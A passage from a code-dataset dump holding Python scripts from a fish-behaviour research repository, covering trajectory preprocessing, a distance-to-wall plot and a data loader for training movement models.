del files[idx - idcs_removed]\n idcs_removed += 1\n\n # remove jumping instances, that is, if an individual travels an unusually great distance\n # which could be an indication that the tracking was momentarily confused\n idx_correction = {}\n if 'jump_threshold' in args.keys():\n odata = deepcopy(data)\n oinfo = ExperimentInfo(odata)\n data, files, idx_correction = correct_jumping(data, files, args)\n\n idcs_remove = []\n for i in range(len(data)):\n # skip files that are less than args['min_seq_len'] seconds long\n if data[i].shape[0] < (args['min_seq_len'] / (args['timestep'] / args['centroids'])):\n idcs_remove.append(i)\n\n idcs_removed = 0\n for idx in tqdm.tqdm(idcs_remove, desc='Removing small files'):\n del data[idx - idcs_removed]\n del files[idx - idcs_removed]\n k = list(idx_correction.keys())[idx-idcs_removed]\n del idx_correction[k]\n idcs_removed += 1\n\n # filtering the data with a simple average (by computing the centroidal position)\n if 'centroids' in args.keys() and args['centroids'] > 1:\n while not data[0].shape[0] % args['centroids'] == 0:\n for i in range(len(data)):\n data[i] = data[i][1:, :]\n assert data[0].shape[0] % args['centroids'] == 0, 'Dimensions do not match'\n\n for i in range(len(data)):\n centroidal_coord = []\n for bidx in range(0, data[i].shape[0], args['centroids']):\n centroidal_coord.append(np.nanmean(\n data[i][bidx:bidx + args['centroids'], :], axis=0))\n data[i] = np.array(centroidal_coord)\n\n # compute setup limits\n info = ExperimentInfo(data)\n\n if 'jump_threshold' in args.keys():\n for k, idx in idx_correction.items():\n i = list(idx_correction.keys()).index(k)\n minXY = oinfo.minXY(idx)\n maxXY = oinfo.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n\n # center the data around (0, 0)\n if 'center' in args.keys() and args['center']:\n data, info = Center(data, info, args).get()\n if 'jump_threshold' in args.keys():\n odata, oinfo = Center(odata, oinfo).get()\n for i, (k, idx) in enumerate(idx_correction.items()):\n minXY = oinfo.minXY(idx)\n maxXY = oinfo.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n\n # normlize data to get them in [-1, 1]\n if 'normalize' in args.keys() and args['normalize']:\n data, info = Normalize(data, info, args).get()\n if 'jump_threshold' in args.keys():\n odata, oinfo = Normalize(odata, oinfo).get()\n for i, (k, idx) in enumerate(idx_correction.items()):\n minXY = info.minXY(idx)\n maxXY = info.maxXY(idx)\n info.setMinXY(minXY, i)\n info.setMaxXY(maxXY, i)\n return data, info, files\n\n\ndef last_known(data, args={}):\n \"\"\"\n :brief: the function will fill in the missing values by replacing them with the last known valid one\n\n :param data: np.array matrix with missing values that need to be filled in\n :param args: dict, optional extra arguments provided to the function\n :return: np.array matrix without missing values\n \"\"\"\n filtered_data = []\n for i in range(data.shape[0]):\n row = data[i]\n if np.isnan(row).any():\n idcs = np.where(np.isnan(row) == True)\n if len(filtered_data) < 1:\n continue\n else:\n for idx in idcs[0]:\n row[idx] = filtered_data[-1][idx]\n filtered_data.append(row)\n return np.array(filtered_data)\n\n\ndef nan_helper(y):\n \"\"\"\n :param y: np.array of values\n :return: tuple(np.array, lambda) of the nan value indices and a lambda value that applies a transformation on those\n \"\"\"\n return np.isnan(y), lambda z: z.nonzero()[0]\n\n\ndef interpolate(data, args={}):\n \"\"\"\n :brief: the function will replace missing values by interpolating neighbouring valid ones\n\n :param data: np.array matrix with missing values that need to be filled in\n :param args: dict, optional extra arguments provided to the function\n :return: np.array matrix without missing values\n \"\"\"\n for col in range(data.shape[1]):\n nans, x = nan_helper(data[:, col])\n data[nans, col] = np.interp(x(nans), x(~nans), data[~nans, col])\n return data\n\n\ndef correct_trajectories(data, args={}):\n for i in range(1, data.shape[0]):\n for ind in range(data.shape[1] // 2):\n ref = data[i, (ind * 2): (ind * 2 + 2)]\n distances = [np.linalg.norm(\n ref - data[i-1, (x * 2): (x * 2 + 2)]) for x in range(data.shape[1] // 2)]\n idx_min = np.argmin(distances)\n if distances[idx_min] < np.linalg.norm(data[i, (idx_min * 2):(idx_min * 2 + 2)] - data[i-1, (idx_min * 2):(idx_min * 2 + 2)]):\n tmp = data[i, (ind * 2): (ind * 2 + 2)]\n data[i, (ind * 2): (ind * 2 + 2)] = data[i,\n (idx_min * 2): (idx_min * 2 + 2)]\n data[i, (idx_min * 2): (idx_min * 2 + 2)] = tmp\n return data\n\n\ndef correct_jumping(data, files, args={'jump_threshold': 0.08}):\n new_data = deepcopy(data)\n\n # bootstrap the inverse index table\n idf_idx_track = {}\n for i in range(len(data)):\n idf_idx_track[i] = i\n\n it = 0\n while it < len(new_data):\n data_it = new_data[it]\n stop_it = -1\n\n for i in range(1, data_it.shape[0]):\n for ind in range(data_it.shape[1] // 2):\n ref = data_it[i, (ind * 2): (ind * 2 + 2)]\n ref_prev = data_it[i-1, (ind * 2): (ind * 2 + 2)]\n distance = np.linalg.norm(ref - ref_prev)\n if distance > args['jump_threshold']:\n stop_it = i\n break\n\n if stop_it > 0:\n break\n\n if stop_it >= 0:\n new_data[it] = data_it[:stop_it, :]\n new_data.append(data_it[stop_it:, :])\n if 'split' not in files[it]:\n files.append(files[it].replace('.dat', '_split.dat'))\n else:\n files.append(files[it])\n\n idf_idx_track[len(files)-1] = idf_idx_track[it]\n\n print('Splitting file ' + files[it] +\n ' at timestep ' + str(stop_it))\n else:\n new_data[it] = data_it\n\n it += 1\n return new_data, files, idf_idx_track\n\n\ndef skip_zero_movement(data, args={'window': 30}):\n \"\"\"\n :brief: the function will remove instances of the trajectories where the individual(s) are not moving faster than\n a set threshold\n\n :param data: np.array\n :param args: dict, optional extra arguments provided to the function\n :return: np.array\n \"\"\"\n\n window = args['window']\n hwindow = window // 2\n idcs_remove = []\n\n window = args['window']\n hwindow = window // 2\n idcs_remove = []\n for ind in range(data.shape[1] // 2):\n reference = data[:, (ind * 2): (ind * 2 + 2)]\n for i in tqdm.tqdm(range(1, reference.shape[0]), desc='Checking movement in window for individual ' + str(ind)):\n lb = max([0, i - hwindow])\n ub = min([i + hwindow, reference.shape[0]])\n\n last_row = reference[i-1, :]\n distance_covered = 0\n\n for w in range(lb, ub):\n distance_covered += np.linalg.norm(last_row - reference[w, :])\n last_row = reference[w, :]\n\n if distance_covered < args['distance_threshold']:\n idcs_remove += [i]\n\n idcs_remove = list(set(idcs_remove))\n if len(idcs_remove) > 0:\n filtered_data = np.delete(data, idcs_remove, axis=0)\n else:\n filtered_data = data\n\n if 'verbose' in args.keys() and args['verbose']:\n print('Lines skipped ' +\n str(data.shape[0] - filtered_data.shape[0]) + ' out of ' + str(data.shape[0]))\n\n if data.shape[0] - filtered_data.shape[0] > 0:\n return skip_zero_movement(filtered_data, args)\n else:\n return filtered_data\n\n\ndef cspace(data, args={}):\n \"\"\"\n :brief: Check if given row index corresponds to an invalid position and if does fill it with a value corresponding to a circular trajectory\n :param row_idx: int, index of the position to check\n :param xy: numpy.array, matrix of x, y positions\n :param output_matrix: list, valid points found so far\n :param args: dict, additional arguments for the fitting method\n :return: list, x, y replacement x, y coordinates along a circular path\n \"\"\"\n\n info = ExperimentInfo([interpolate(data, args)])\n if not 'radius' in args.keys():\n radius = (0.29, 0.19)\n else:\n radius = args['radius']\n center = info.center()\n\n for i in range(data.shape[1] // 2):\n r = np.sqrt((data[:, i * 2] - center[0]) ** 2 +\n (data[:, i * 2 + 1] - center[1]) ** 2)\n idcs = np.where(r < radius[1])\n data[idcs, i * 2] = np.nan\n data[idcs, i * 2 + 1] = np.nan\n\n def angle_to_pipi(dif):\n while True:\n if dif < -np.pi:\n dif += 2. * np.pi\n if dif > np.pi:\n dif -= 2. * np.pi\n if (np.abs(dif) <= np.pi):\n break\n return dif\n\n def find_next(xy, row_idx):\n \"\"\"\n :brief: Given a matrix of xy positions and the current timestep, find the next valid (non nan) point\n :param xy: numpy.array, matrix of x, y positions (m x 2 where m the number of timsteps)\n :param row_idx: int, current timestep\n :return: tuple, the next known point accompanied by its index in the position matrix\n \"\"\"\n\n next_known = (-1, -1)\n for i in range(row_idx + 1, np.shape(xy)[0]):\n if not np.isnan(xy[i]).any():\n next_known = (xy[i], i - row_idx)\n break\n return next_known\n\n def fit_circle(pt1, pt2, center):\n \"\"\"\n :brief: Fit a circle between two points and a given center\n :param pt1: tuple, x, y positions for the first point\n :param pt2: tuple, x, y positions for the second point\n :param center: tuple, desired center for the fitted circle\n :return: tuple(float, tuple(float, float, float)), r is the radius of the fitted circle,\n theta the angle between the new points,\n theta1, theta2 the angle of pt1 and pt2\n starting from zero, respectively\n \"\"\"\n\n r1 = np.sqrt((pt1[0] - center[0]) ** 2 + (pt1[1] - center[1]) ** 2)\n r2 = np.sqrt((pt2[0] - center[0]) ** 2 + (pt2[1] - center[1]) ** 2)\n r = (r1 + r2) / 2.0\n\n theta1 = np.arctan2(pt1[1], pt1[0])\n theta1 = (theta1 + np.pi) % (2 * np.pi)\n theta2 = np.arctan2(pt2[1], pt2[0])\n theta2 = (theta2 + np.pi) % (2 * np.pi)\n theta = angle_to_pipi(theta1 - theta2)\n return r, (theta, theta1, theta2)\n\n def fill_between_circular(last_known, next_known, center):\n \"\"\"\n :brief: Fill a circular trajectory with mising values given the first and next valid positions\n :param last_known: list, the last known valid x, y position\n :param next_known: list, the next known point and the number of missing values between this and the last known\n :return: list, x, y position that was estimated according to the given points\n \"\"\"\n\n r, (theta, theta1, _) = fit_circle(\n np.array(last_known), np.array(next_known[0]), center)\n sgn = np.sign(theta)\n phi = (np.abs(theta) / (next_known[1] + 1)) # step angle\n estimated = [r * np.cos(theta1 - sgn * phi) + center[0],\n r * np.sin(theta1 - sgn * phi) + center[1]]\n return estimated\n\n def fill_forward_circular(second_last_known, last_known, args):\n \"\"\"\n :brief: Given the two last known positions and the center of a circular setup,\n attempt to find the next position of a missing trajectory\n :param second_last_known: list, the second to last known position\n :param last_known: list, the last known valid x, y position\n :return: tuple, the next known point accompanied by its index in the position matrix\n \"\"\"\n\n r, (theta, _, theta2) = fit_circle(\n np.array(second_last_known), np.array(last_known), center)\n sgn = np.sign(theta)\n phi = np.abs(theta) # step angle\n return [r * np.cos(theta2 - sgn * phi) + center[0],\n r * np.sin(theta2 - sgn * phi) + center[1]]\n\n def fill_circle(row_idx, xy, output_matrix, args):\n \"\"\"\n :brief: Main logic to fill missing trajectory values with circular ones\n :param row_idx: int, current row of interest index\n :param xy: np.array, original trajectory matrix\n :param output_matrix: np.array, containing the corrected positions so far\n :param args: dict, additional arguments for the algorithm\n :return: np.array, valid row with circular tajectory\n \"\"\"\n row = xy[row_idx]\n\n if np.isnan(row).any():\n next_known = find_next(xy, row_idx)\n\n if len(output_matrix) < 1: # continue trajectory according to next two known positions\n second_next = find_next(xy, row_idx + next_known[1] + 1)\n if second_next[1] > 1:\n second_next = (fill_between_circular(\n next_known[0], second_next, center), -1)\n return fill_forward_circular(second_next[0], next_known[0], center)\n else:\n last_known = output_matrix[-1]\n if next_known[1] > 0:\n return fill_between_circular(last_known, next_known, center)\n else: # continue trajectory according to last two known positions\n return fill_forward_circular(output_matrix[-2], last_known, center)\n else:\n return row\n\n for idx in range(data.shape[1] // 2):\n output_matrix = []\n for i in range(data.shape[0]):\n row = fill_circle(\n i, data[:, (idx * 2): (idx * 2 + 2)], output_matrix, center)\n if len(row) == 0:\n continue\n output_matrix.append(row)\n corrected_matrix = np.array(output_matrix)\n data[:, idx * 2] = corrected_matrix[:, 0]\n data[:, idx * 2 + 1] = corrected_matrix[:, 1]\n return data\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--filename', '-f', type=str,\n help='Position file name',\n required=True)\n parser.add_argument('--out_dir', type=str,\n help='Explicit output directory path',\n default='',\n required=False)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--has_probs', action='store_true',\n help='Check this flag if the position file contains idTracker positions',\n default=True)\n parser.add_argument('--toulouse', action='store_true',\n help='Check this flag if the position file contains the toulouse files',\n default=False)\n parser.add_argument('--bobi', action='store_true',\n help='Check this flag if the position file contains the BOBI files',\n default=False)\n parser.add_argument('--plos', action='store_true',\n help='Check this flag if the position file contains the plos files',\n default=False)\n parser.add_argument('--bl', type=float,\n help='Body length',\n default=0.035,\n required=False)\n parser.add_argument('--radius', type=float,\n help='Radius for circular setups',\n default=0.25,\n required=False)\n parser.add_argument('--min_seq_len', type=float,\n help='Minimum sequence length in seconds to keep when filtering',\n default=0.6,\n required=False)\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n archive = Archive(args)\n\n if args.bobi:\n data, files = load(args.path, args.filename, has_probs=True, has_heading=False)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1500,\n 'scale': -1, # automatic scale detection\n 'radius': args.radius,\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n elif args.toulouse:\n data, files = load(args.path, args.filename, False)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1080,\n 'scale': -1, # automatic scale detection\n 'radius': args.radius,\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n elif args.plos:\n data, files = load(args.path, args.filename, True)\n data, info, files = preprocess(data, files,\n # last_known,\n # skip_zero_movement,\n # interpolate,\n cspace,\n args={\n 'invertY': True,\n 'resY': 1024,\n 'scale': 1.11 / 1024,\n 'centroids': args.centroids,\n 'distance_threshold': 0.00875,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n exp_num = w2n.word_to_num(os.path.basename(\n str(Path(f).parents[0])).split('_')[-1])\n archive.save(data[i], 'exp_' + str(exp_num) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(exp_num) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n else:\n data, files = load(args.path, args.filename, True)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n # cspace,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1500,\n 'scale': -1, # automatic scale detection\n # 'scale': 1.12 / 1500,\n 'radius': args.radius,\n\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n"
},
{
"alpha_fraction": 0.5145992040634155,
"alphanum_fraction": 0.5211084485054016,
"avg_line_length": 36.60139846801758,
"blob_id": "a9e53330b000849d0af2ebf29018e003b8ec23a3",
"content_id": "950293f71877f289129f3c3d8cf4b644826da826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5377,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 143,
"path": "/find/plots/spatial/distance_to_wall.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef distance_plot(data, positions, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = positions[k]\n vel = Velocities(pos, args.timestep).get()\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n labels = []\n for k in sorted(data.keys()):\n labels.append(k)\n distances = data[k]\n leaders = leadership[k]\n\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(leaders)):\n leadership_mat = np.array(leaders[idx])\n dist_mat = distances[idx]\n\n num_individuals = dist_mat.shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += dist_mat[idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += dist_mat[idx_leaders, fidx].tolist()[0]\n\n print('Dist to wall', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(colorcycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n positions = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n positions[e] = []\n for p in pos:\n matrix = np.loadtxt(p) * args.radius\n dist_mat = []\n for i in range(matrix.shape[1] // 2):\n distance = args.radius - \\\n np.sqrt(matrix[:, i * 2] ** 2 + matrix[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n data[e].append(dist_mat)\n positions[e].append(matrix)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n distance_plot(data, positions, ax, args)\n\n ax.set_xlabel(r'$r_w$ (m)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'distance_to_wall.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Distance to wall figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.44201424717903137,
"alphanum_fraction": 0.4645981788635254,
"avg_line_length": 34.615943908691406,
"blob_id": "4f90c2f8e66dd43ccacf715e6c0f9cb08c82216e",
"content_id": "170ee772cb631b2287d938c336a7cf820ae2b6d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9830,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 276,
"path": "/find/models/loader.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import glob\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef mem_pair_cart(pos, args):\n offset = 1\n if args.timesteps_skip > 0:\n offset = args.timesteps_skip\n\n input_list = []\n output_list = []\n for p in pos:\n inputs = None\n outputs = None\n\n if args.distance_inputs:\n dist = np.sqrt((p[:, 0] - p[:, 2]) ** 2 +\n (p[:, 1] - p[:, 3]) ** 2)\n rad = 1 - np.array([\n np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2),\n np.sqrt(p[:, 2] ** 2 + p[:, 3] ** 2)\n ]).T\n\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-offset, :]\n pos_t = p[offset:-1, :]\n vel_t = (pos_t - pos_t_1) / args.timestep\n vel_t_1 = np.roll(vel_t, shift=1, axis=0)\n pos_t_1 = pos_t_1[1:-1, :]\n vel_t_1 = vel_t_1[1:-1, :]\n pos_t = pos_t[1:-1, :]\n vel_t = vel_t[1:-1, :]\n\n if args.distance_inputs:\n dist_t_1 = np.roll(dist, shift=1)[2:-(offset+1)]\n rad_t_1 = np.roll(rad, shift=1, axis=0)[2:-(offset+1), :]\n\n for fidx in range(p.shape[1] // 2):\n X = []\n Y = []\n\n X.append(pos_t_1[:, fidx * 2])\n X.append(pos_t_1[:, fidx * 2 + 1])\n X.append(vel_t_1[:, fidx * 2])\n X.append(vel_t_1[:, fidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, fidx])\n\n Y.append(vel_t[:, fidx * 2] - vel_t_1[:, fidx * 2])\n Y.append(vel_t[:, fidx * 2 + 1] - vel_t_1[:, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if fidx == nidx:\n continue\n X.append(pos_t_1[:, nidx * 2])\n X.append(pos_t_1[:, nidx * 2 + 1])\n X.append(vel_t_1[:, nidx * 2])\n X.append(vel_t_1[:, nidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, nidx])\n\n if args.distance_inputs:\n X.append(dist_t_1)\n\n if inputs is None:\n inputs = X\n outputs = Y\n else:\n inputs = np.append(inputs, X, axis=1)\n outputs = np.append(outputs, Y, axis=1)\n input_list.append(inputs.T)\n output_list.append(outputs.T)\n return input_list, output_list\n\n\ndef ready_data(data, args):\n def split(x, y, args):\n X = np.empty([0, args.num_timesteps, x.shape[1]])\n if args.prediction_steps == 1:\n Y = np.empty([0, y.shape[1]])\n else:\n Y = np.empty([0, 1, args.prediction_steps, y.shape[1]])\n\n iters = 1\n if args.timesteps_skip > 0:\n iters = args.timesteps_skip\n\n for idxskip in range(iters):\n xh = x[idxskip::(args.timesteps_skip + 1)].copy()\n yh = y[idxskip::(args.timesteps_skip + 1)].copy()\n\n for i in range(args.num_timesteps, xh.shape[0] - args.prediction_steps):\n inp = xh[(i-args.num_timesteps):i, :].reshape(1,\n args.num_timesteps, xh.shape[1])\n\n if args.prediction_steps == 1:\n out = yh[i-1, :]\n else:\n out = yh[(i-1):(i-1+args.prediction_steps), :].reshape(1,\n 1, args.prediction_steps, yh.shape[1])\n X = np.vstack((X, inp))\n Y = np.vstack((Y, out))\n return X, Y\n return split(*data, args)\n\n\ndef no_mem_pair_cart(pos, args):\n inputs = None\n outputs = None\n for p in tqdm(pos, desc='Loading files'):\n if p.shape[0] < 2 + args.timesteps_skip:\n continue\n\n offset = 1\n if args.timesteps_skip > 0:\n offset = args.timesteps_skip\n\n if args.distance_inputs:\n dist = np.sqrt((p[:, 0] - p[:, 2]) ** 2 +\n (p[:, 1] - p[:, 3]) ** 2)\n rad = 1 - np.array([\n np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2),\n np.sqrt(p[:, 2] ** 2 + p[:, 3] ** 2)\n ]).T\n\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-offset, :]\n pos_t = p[offset:-1, :]\n vel_t = (pos_t - pos_t_1) / args.timestep\n vel_t_1 = np.roll(vel_t, shift=1, axis=0)\n pos_t_1 = pos_t_1[1:-1, :]\n vel_t_1 = vel_t_1[1:-1, :]\n pos_t = pos_t[1:-1, :]\n vel_t = vel_t[1:-1, :]\n\n if args.distance_inputs:\n dist_t_1 = np.roll(dist, shift=1)[2:-(offset+1)]\n rad_t_1 = np.roll(rad, shift=1, axis=0)[2:-(offset+1), :]\n\n for fidx in range(p.shape[1] // 2):\n X = []\n Y = []\n\n X.append(pos_t_1[:, fidx * 2])\n X.append(pos_t_1[:, fidx * 2 + 1])\n X.append(vel_t_1[:, fidx * 2])\n X.append(vel_t_1[:, fidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, fidx])\n\n Y.append(vel_t[:, fidx * 2] - vel_t_1[:, fidx * 2])\n Y.append(vel_t[:, fidx * 2 + 1] - vel_t_1[:, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if fidx == nidx:\n continue\n X.append(pos_t_1[:, nidx * 2])\n X.append(pos_t_1[:, nidx * 2 + 1])\n X.append(vel_t_1[:, nidx * 2])\n X.append(vel_t_1[:, nidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, nidx])\n\n if args.distance_inputs:\n X.append(dist_t_1)\n\n if inputs is None:\n inputs = X\n outputs = Y\n else:\n inputs = np.append(inputs, X, axis=1)\n outputs = np.append(outputs, Y, axis=1)\n return inputs, outputs\n\n\ndef split_cart(num_individuals, data, args):\n if num_individuals == 2:\n if 'LSTM' in args.model:\n X_list, Y_list = mem_pair_cart(data, args)\n x_shape = (0, args.num_timesteps, X_list[0].shape[1])\n if args.prediction_steps == 1:\n y_shape = (0, Y_list[0].shape[1])\n else:\n y_shape = (0, 1, args.prediction_steps, Y_list[0].shape[1])\n Xh = np.empty(x_shape)\n Yh = np.empty(y_shape)\n for idx in tqdm(range(len(X_list)), desc='Converting data to LSTM compatible format'):\n Xi = X_list[idx]\n Yi = Y_list[idx]\n (Xi, Yi) = ready_data((Xi, Yi), args)\n if Xi.shape[0] == 0:\n continue\n Xh = np.vstack((Xh, Xi))\n Yh = np.vstack((Yh, Yi))\n return Xh, Yh\n else:\n X, Y = no_mem_pair_cart(data, args)\n return X.T, Y.T\n return [], []\n\n\nclass Loader:\n def __init__(self, path):\n self._path = path\n self._num_individuals = None\n\n def prepare(self, data, args):\n assert self._num_individuals is not None\n if not args.polar:\n return split_cart(self._num_individuals, data, args)\n else:\n return [], [] # not implemented\n\n def split_to_sets(self, inputs, outputs, args):\n assert sum(\n [args.train_fraction, args.val_fraction, args.test_fraction]) == 1, 'Split fractions should add up to 1.0'\n\n # set lengths\n train_split = int(inputs.shape[0] * args.train_fraction)\n val_split = int(inputs.shape[0] * args.val_fraction)\n\n # actual data split\n train_inputs = inputs[:train_split]\n train_outputs = outputs[:train_split]\n\n val_inputs = inputs[train_split:(train_split + val_split)]\n val_outputs = outputs[train_split:(train_split + val_split)]\n\n test_inputs = inputs[(train_split + val_split):]\n test_outputs = outputs[(train_split + val_split):]\n\n return (train_inputs, train_outputs), (val_inputs, val_outputs), (test_inputs, test_outputs)\n\n def load_from_sets(self,\n training_filename='training_{type}', val_filename='val_{type}', test_filename='test_{type}',\n training_path='/train', val_path='/val', test_path='/test'):\n\n with open(self._path + training_path + '/' + training_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n train_inputs = pickle.load(f)\n\n with open(self._path + training_path + '/' + training_filename.replace('{type}', 'ouputs') + '.pkl', 'rb') as f:\n train_outputs = pickle.load(f)\n\n with open(self._path + val_path + '/' + val_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n val_inputs = pickle.load(f)\n\n with open(self._path + val_path + '/' + val_filename.replace('{type}', 'ouputs') + '.pkl', 'rb') as f:\n val_outputs = 